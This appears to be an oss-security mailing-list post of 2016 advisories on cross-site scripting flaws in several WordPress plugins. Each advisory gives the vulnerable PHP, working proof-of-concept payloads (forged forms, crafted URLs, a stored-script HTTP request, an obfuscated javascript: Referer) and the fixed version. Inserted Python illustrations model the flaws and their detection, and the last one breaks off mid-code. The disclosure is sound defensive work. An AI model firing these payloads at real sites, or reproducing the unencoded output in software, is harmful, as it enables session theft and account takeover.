Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
Date: Thu, 4 Aug 2016 19:40:14 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Cross-Site Scripting vulnerabilities affecting seven
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Scripting in Activity Log WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Activity Log
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0022

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Activity Log [2] WordPress Plugin
version 2.3.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in Activity Log version 2.3.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Activity Log [2] WordPress Plugin helps monitor & log all changes
and activities on a WordPress site. A Cross-Site Scripting vulnerability
was found in the Activity Log WordPress Plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf. In order to exploit this issue, the attacker has to lure/force a
logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file classes/class-aal-admin-ui.php and is
caused by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

public function activity_log_page_func() {
	$this->get_list_table()->prepare_items();
	?>
	<div class="wrap">
		<h2 class="aal-page-title"><?php _e( 'Activity Log', 'aryo-activity-log' ); ?></h2>

		<form id="activity-filter" method="get">
			<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
			<?php $this->get_list_table()->display(); ?>
		</form>
	</div>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.
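As an added illustration (not code from the advisory, the plugin or WordPress), the Python model below reproduces the $_REQUEST merge that makes this pollution possible and shows the defender's two answers: flag requests that carry the same parameter name in URL and body with different values, and render the slug from $_GET only, attribute-encoded. The request_order default of "GP", the slug allowlist standing in for WordPress's own check, and the sample request are assumptions of this example.

```python
import re
from html import escape
from urllib.parse import parse_qs

# Constructed sample request modelled on the advisory: a benign "page" slug in the
# URL and a hostile "page" value in the POST body (URL-encoded form data).
QUERY = "page=activity_log_page"
BODY = "page=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E"


def php_request_array(query_string, post_body, request_order="GP"):
    """Model of how PHP populates $_REQUEST (hypothetical re-implementation).

    Sources are merged in request_order, each later source overwriting earlier
    ones; php.ini-production ships request_order = "GP", so a POST parameter
    silently replaces a GET parameter of the same name.
    """
    sources = {
        "G": parse_qs(query_string, keep_blank_values=True),
        "P": parse_qs(post_body, keep_blank_values=True),
    }
    merged = {}
    for source in request_order:
        for name, values in sources[source].items():
            merged[name] = values[-1]  # PHP keeps the last value of a repeated key
    return merged


SLUG_RE = re.compile(r"^[a-z0-9_-]+$")


def wordpress_validates_page(query_string):
    """Stand-in for the core check the advisory refers to: WordPress only looks at
    the slug in the URL ($_GET), modelled here as a strict slug allowlist."""
    page = parse_qs(query_string).get("page", [""])[0]
    return bool(SLUG_RE.match(page))


def find_polluted_params(query_string, post_body):
    """Defender's check: parameter names that arrive in both the query string and
    the body with different values. An admin "page" slug belongs in the URL only,
    so a conflicting POST copy is worth logging."""
    get = parse_qs(query_string, keep_blank_values=True)
    post = parse_qs(post_body, keep_blank_values=True)
    return sorted(name for name in get.keys() & post.keys() if get[name] != post[name])


def render_hidden_page_field_vulnerable(request):
    # Same pattern as the advisory: the $_REQUEST value goes into the attribute raw.
    return '<input type="hidden" name="page" value="%s" />' % request["page"]


def render_hidden_page_field_fixed(query_string):
    # Fix: take the slug from the query string only and attribute-encode it
    # (html.escape plays the role WordPress's esc_attr() would play in PHP).
    page = parse_qs(query_string).get("page", [""])[0]
    return '<input type="hidden" name="page" value="%s" />' % escape(page, quote=True)


if __name__ == "__main__":
    request = php_request_array(QUERY, BODY)
    print("URL slug passes core validation:", wordpress_validates_page(QUERY))
    print("$_REQUEST['page'] actually used :", request["page"])
    print("polluted parameters             :", find_polluted_params(QUERY, BODY))
    print(render_hidden_page_field_vulnerable(request))
    print(render_hidden_page_field_fixed(QUERY))
```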

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=activity_log_page" method="POST">
			<input type="hidden" name="page" value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_activity_log_wordpress_plugin.html
[2] https://wordpress.org/plugins/aryo-activity-log/
[3] https://downloads.wordpress.org/plugin/aryo-activity-log.zip
------------------------------------------------------------------------
Cross-Site Scripting in Count per Day WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Count per Day
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0024

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Count per Day [2] WordPress Plugin
version 3.5.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Count per Day version 3.5.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Count per Day [2] WordPress Plugin shows reads and visitors per
page, visitors today, yesterday, last week, last months and other
statistics. A Cross-Site Scripting vulnerability was found in the Count
per Day WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file counter-options.php and is caused by the
lack of output encoding on the limit POST parameter.

<?php // mass bots ?>
<div class="postbox">
<?php
$limit = (isset($o['massbotlimit'])) ? $o['massbotlimit'] : 25;
$limit = (isset($_POST['limit'])) ? $_POST['limit'] : $limit;
$limit_input = '<input type="text" size="3" name="limit" value="'.$limit.'" style="text-align:center" />';

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/options-general.php?page=count-per-day%2Fcounter-options.php" method="POST">
			<input type="hidden" name="limit" value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_count_per_day_wordpress_plugin.html
[2] https://wordpress.org/plugins/count-per-day/
[3] https://downloads.wordpress.org/plugin/count-per-day.3.5.5.zip
------------------------------------------------------------------------
Cross-Site Scripting in FormBuilder WordPress Plugin
------------------------------------------------------------------------
Peter Ganzevles, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Reflected Cross-Site Scripting (XSS) vulnerability has been found in
the FormBuilder WordPress Plugin. By using this vulnerability an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any logged-in admin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0007

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder [2] version 1.05.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in FormBuilder version 1.06 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The FormBuilder [2] Plugin for WordPress allows you to build contact
forms in the WordPress administrative interface without needing to know
PHP or HTML. A Reflected Cross-Site Scripting (XSS) vulnerability has
been found in the FormBuilder WordPress Plugin. By using this
vulnerability an attacker can inject malicious JavaScript code into the
application, which will execute within the browser of any logged-in
admin who views the link in the proof of concept below.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The FormBuilder plugin is vulnerable to a Reflected Cross-Site Scripting
attack in its main page. This means that an attacker can craft a link,
such as the one below, which will inject malicious JavaScript into the
page of any admin visiting it.

The vulnerability lies in a piece of code in the file
html/options_default.inc.php. Here, on lines 35-40, the following form
is created:

35: <form class='formSearch' name="formSearch" method="GET" action="<?php echo FB_ADMIN_PLUGIN_PATH; ?>">
36: 	<input name='page' type="hidden" value="<?php echo $_GET['page']; ?>" />
37: 	<input name='pageNumber' type="hidden" value="<?php echo $_GET['pageNumber']; ?>" />
38: 	<input name='formSearch' type="text" size="10" value="<?php echo $formSearch; ?>" />
39: 	<input class='searchButton' name='Search' type="submit" value="Search" />
40: </form>

This form has two input fields which are populated with data taken
directly from a GET parameter that is not sanitized beforehand: 
$_GET['page'] and $_GET['pageNumber']. While supplying a malicious
payload to the $_GET['pageNumber'] parameter only causes the application
to throw an error, supplying it to the $_GET['page'] parameter will
cause it to be executed.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following URL causes an alert box to spawn, which, while not
dangerous in and of itself, is an easy way to prove that it is
vulnerable.

http://<target>/wp-admin/tools.php?page=formbuilder.php&pageNumber=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&formSearch=test&Search=Search
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_formbuilder_wordpress_plugin.html
[2] https://wordpress.org/plugins/formbuilder/
[3] https://downloads.wordpress.org/plugin/formbuilder.1.06.zip
------------------------------------------------------------------------
Cross-Site Scripting in WordPress Landing Pages Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting (XSS) vulnerability has been found in
the WordPress Landing Pages Plugin. By using this vulnerability an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the affected
settings page, in general a WP admin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160721-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Landing Pages [2]
version 2.2.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in WordPress Landing Pages version 2.2.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Landing Pages [2] creates landing pages (a.k.a. conversion or
splash pages) for your WordPress site. It gives site owners the ability
to monitor and track conversion rates, run a/b or multivariate split
tests on landing pages, and increase lead flow.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request.

The "open-tab" request parameter is neither validated (it accepts
<script> tags) nor output encoded.

landing-pages/classes/class.settings.php:

177: $active_tab = $_REQUEST['open-tab'];
	
[...]
	
204: echo "<form
action='edit.php?post_type=landing-page&page=lp_global_settings'
method='POST'>  	<input type='hidden' name='nature'
value='lp-global-settings-save'>  	<input type='hidden' name='open-tab'
id='id-open-tab' value='{$active_tab}'>";

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/edit.php?post_type=landing-page&page=lp_global_settings&open-tab=foobar%5C%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_wordpress_landing_pages_plugin.html
[2] https://wordpress.org/plugins/landing-pages/
[3] https://downloads.wordpress.org/plugin/landing-pages.2.2.5.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin
------------------------------------------------------------------------
Job Diesveld, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability has been found in the Events Made
Easy WordPress plugin. By using this issue an attacker can create a
specially crafted event which, when posted to WordPress, injects
malicious JavaScript code into the application. This code will execute
within the browser of any user who views the relevant application
content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160729-0001

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in Events Made Easy [2] plugin version 1.6.21.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Events Made Easy [3] plugin
version 1.6.20.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Events Made Easy [3] plugin is a full-featured event
management solution for WordPress. It supports public, private, draft
and recurring events, locations management, RSVP (+ optional approval),
Paypal, 2Checkout, FirstData and Google maps.

Upon adding a new Events Made Easy event within the WordPress admin
interface, the plugin allows script code to be entered in, among others,
the Single Event Format textbox. The plugin insufficiently checks the
nonces closedpostboxesnonce and meta-box-order-nonce when the event is
posted to the server, and no other nonce is employed to prevent CSRF. If
an attacker can lure a WordPress admin into posting an event with
malicious script code, this code is subsequently stored in the
application and can be used to perform a wide variety of actions, such
as stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, and logging their keystrokes.

https://sumofpwn.nl/advisory/2016/poc-1.png

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
The following request can be used to create an event containing
JavaScript that will obtain the cookie of the current user:


POST /wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16 HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------224523339434990794855940370
Content-Length: 8579
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_status"
	
5
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_id"
	
-1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_seats"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="price"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="currency"
	
EUR
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_max_allowed"
	
10
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_min_allowed"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discount"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_days"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_hours"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_end_target"
	
start
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_name"
	
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_slug"
	
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_start_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_end_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_end_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_freq"
	
daily
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_interval"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byweekno"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byday"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_start_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_end_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_time"
	
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_time"
	
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_page_title_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_page_title_format"
	
lalalala
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_single_event_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_single_event_format"
	
<p>#_STARTDATE -
#_STARTTIME</p><p>#_TOWN</p><p>#_NOTES</p><p>#_ADDBOOKINGFORM</p><p>#_MAP</p><script>alert(document.cookies)</script>
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_contactperson_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_recorded_ok_html_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_recorded_ok_html"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_respondent_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_respondent_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_pending_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_pending_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_updated_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_updated_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_cancelled_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_cancelled_email_body"
	
Dear #_RESPNAME,
	
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been
cancelled.
	
Yours faithfully,awfe
#_CONTACTPERSON
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_denied_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_denied_email_body"
	
Dear #_RESPNAME,
	
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been
denied.
	
Yours faithfully,
#_CONTACTPERSONawef
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_form_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_form_format"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_cancel_form_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_cancel_form_format"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_name"
	
piet
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_address"
	
kaas
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_town"
	
foo
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_latitude"
	
57.198
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_longitude"
	
9.67063
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="content"
	
gold
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_url"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_id"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_url"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_update_button"
	
Update »
-----------------------------224523339434990794855940370
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html
[2] https://downloads.wordpress.org/plugin/events-made-easy.1.6.21.zip
[3] https://wordpress.org/plugins/events-made-easy/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in search function Activity Log
WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Activity Log
WordPress Plugin.  This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Activity Log [3] WordPress Plugin
version 2.3.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in Activity Log version 2.3.3 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Activity Log [3] WordPress Plugin helps monitor & log all changes
and activities on a WordPress site. A reflected Cross-Site Scripting
vulnerability exists in the Activity Log WordPress plugin. This
vulnerability allows an attacker to perform any action with the
privileges of the target user.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability is caused by insufficient filtering of the search
input parameter $search_data in the file
aryo-activity-log/classes/class-aal-activity-log-list-table.php at line
483. The WordPress sanitize_text_field [5] sanitizer is used, but it
still allows spaces, double quotes and parentheses, which suffice to
craft a Cross-Site Scripting payload.

public function search_box( $text, $input_id ) {

	$search_data = isset( $_REQUEST['s'] ) ? sanitize_text_field( $_REQUEST['s'] ) : '';

	$input_id = $input_id . '-search-input';
	?>
	<p class="search-box">
		<label class="screen-reader-text" for="<?php echo $input_id ?>"><?php echo $text; ?>:</label>
		<input type="search" id="<?php echo $input_id ?>" name="s" value="<?php echo $search_data; ?>" />
		<?php submit_button( $text, 'button', false, false, array('id' => 'search-submit') ); ?>
	</p>

When a search on the activity log is performed, a CSRF token is added to
the URL; however, it is not checked. Consequently, the issue can be
exploited by luring the target user into clicking a specially crafted
link or visiting a malicious website (or advertisement).
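Added example, not the plugin's or WordPress's code: a Python approximation of sanitize_text_field() beside an attribute-encoding fix, checked by parsing the rendered <input> the way a browser would. The same sanitize-versus-encode point applies to the unencoded attribute values in the Activity Log, Count per Day, FormBuilder and Landing Pages advisories above; the sanitizer emulation and the sample search term (taken from the proof of concept) are assumptions of this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample: the search term from the advisory's proof of concept.
POC_SEARCH = '111" onfocus=alert(document.domain) " autofocus="'


def sanitize_text_field_approx(value):
    """Approximation (not WordPress's code) of sanitize_text_field(): drop
    <script>/<style> blocks and remaining tags, drop %xx octets and collapse
    whitespace. It never encodes quotes or angle brackets, so it is a content
    filter, not an output encoder."""
    filtered = re.sub(r"<(script|style)[^>]*?>.*?</\1>", "", value, flags=re.S | re.I)
    filtered = re.sub(r"<[^>]*>", "", filtered)
    filtered = re.sub(r"%[0-9a-fA-F]{2}", "", filtered)
    return re.sub(r"\s+", " ", filtered).strip()


def render_search_input(search_data, encode):
    """The advisory's <input type="search"> with value= either raw (the vulnerable
    echo) or attribute-encoded (what esc_attr() would do in PHP)."""
    value = escape(search_data, quote=True) if encode else search_data
    return '<input type="search" id="s-search-input" name="s" value="%s" />' % value


class _InputAttrs(HTMLParser):
    """Collects the attributes of the first <input> tag, parsed browser-style."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def parsed_input_attributes(markup):
    """Return the attribute map a browser would build for the rendered tag; an
    'onfocus' key means the value broke out of the value="..." attribute."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


if __name__ == "__main__":
    sanitized = sanitize_text_field_approx(POC_SEARCH)
    print("after sanitize_text_field:", sanitized)
    print("raw echo     ->", parsed_input_attributes(render_search_input(sanitized, encode=False)))
    print("attr-encoded ->", parsed_input_attributes(render_search_input(sanitized, encode=True)))
```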

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=activity_log_page&s=111"+onfocus=alert(document.domain)+"+autofocus="&paged=1
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_search_function_activity_log_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/aryo-activity-log/
[4] https://downloads.wordpress.org/plugin/aryo-activity-log.zip
[5] https://developer.wordpress.org/reference/functions/sanitize_text_field/
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Count per Day WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Count per Day
WordPress Plugin. This issue can be exploited by an unauthenticated
attacker and allows an attacker to perform a wide variety of actions,
such as stealing users' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160717-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Count per Day [2] WordPress Plugin
version 3.5.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Count per Day version 3.5.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Count per Day [2] WordPress Plugin shows reads and visitors per
page, visitors today, yesterday, last week, last months and other
statistics. A Cross-Site Scripting vulnerability was found in the Count
per Day WordPress Plugin. This issue can be exploited by an
unauthenticated attacker and allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
When the Referer header is manipulated to contain a javascript: URL, the
value is rendered on the admin page within the referers list as an
<a href> attribute. When an admin (or any user above author level)
clicks on it, the XSS is executed.

Tags are stripped, so it is not possible to execute the XSS directly on
page load. Single and double quotes are escaped, but this can be worked
around. Example:

Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))

The referer list shows the top 20, but it is easy to get the attack
referer into the top by looping over requests with unique X-Forwarded-For
IPs. By default referers are stored (this can be turned off in the
plugin's settings). Up to 150 characters of the referer are stored
(configurable up to a maximum of 500).
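Added example (not Count per Day's code) of the defensive side of this issue in Python: only http(s) referers become links, whatever quoting is applied, and a scan over constructed access-log lines surfaces stored referers that carry a script scheme. The 150-character limit follows the advisory; the log format, the sample lines and the allowlist are constructed assumptions of this example.

```python
import re
from html import escape
from urllib.parse import urlsplit

# Constructed sample: the Referer value from the advisory's proof of concept.
POC_REFERER = ("javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)"
               "+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))")

SAFE_SCHEMES = {"http", "https"}
STORED_REFERER_LEN = 150  # the plugin's default truncation per the advisory


def referer_to_href(referer, max_len=STORED_REFERER_LEN):
    """Attribute-safe href for a stored Referer, or None when it must not be
    linked. Escaping quotes (what the plugin did) is not enough: the scheme
    decides whether clicking runs script, so allowlist it."""
    # Browsers ignore tab/newline anywhere and C0/space at the ends before
    # parsing, so "java\nscript:" still runs; normalise the same way first.
    cleaned = re.sub(r"[\t\n\r]", "", referer)
    cleaned = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", cleaned)
    if urlsplit(cleaned).scheme.lower() not in SAFE_SCHEMES:
        return None
    return escape(cleaned[:max_len], quote=True)


# Combined log format (constructed): client, request, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines: one normal referer, one script-scheme referer, one absent.
LOG_SAMPLE = [
    '203.0.113.7 - - [29/Jul/2016:13:22:01 +0200] "GET / HTTP/1.1" 200 5120 '
    '"https://www.example.org/" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Jul/2016:13:22:05 +0200] "GET / HTTP/1.1" 200 5120 '
    '"javascript:c=String.fromCharCode;alert(c(83))" "Mozilla/5.0"',
    '198.51.100.9 - - [29/Jul/2016:13:22:09 +0200] "GET / HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0"',
]


def flag_script_referers(log_lines):
    """Detection: (client, referer) pairs whose Referer does not carry an http(s)
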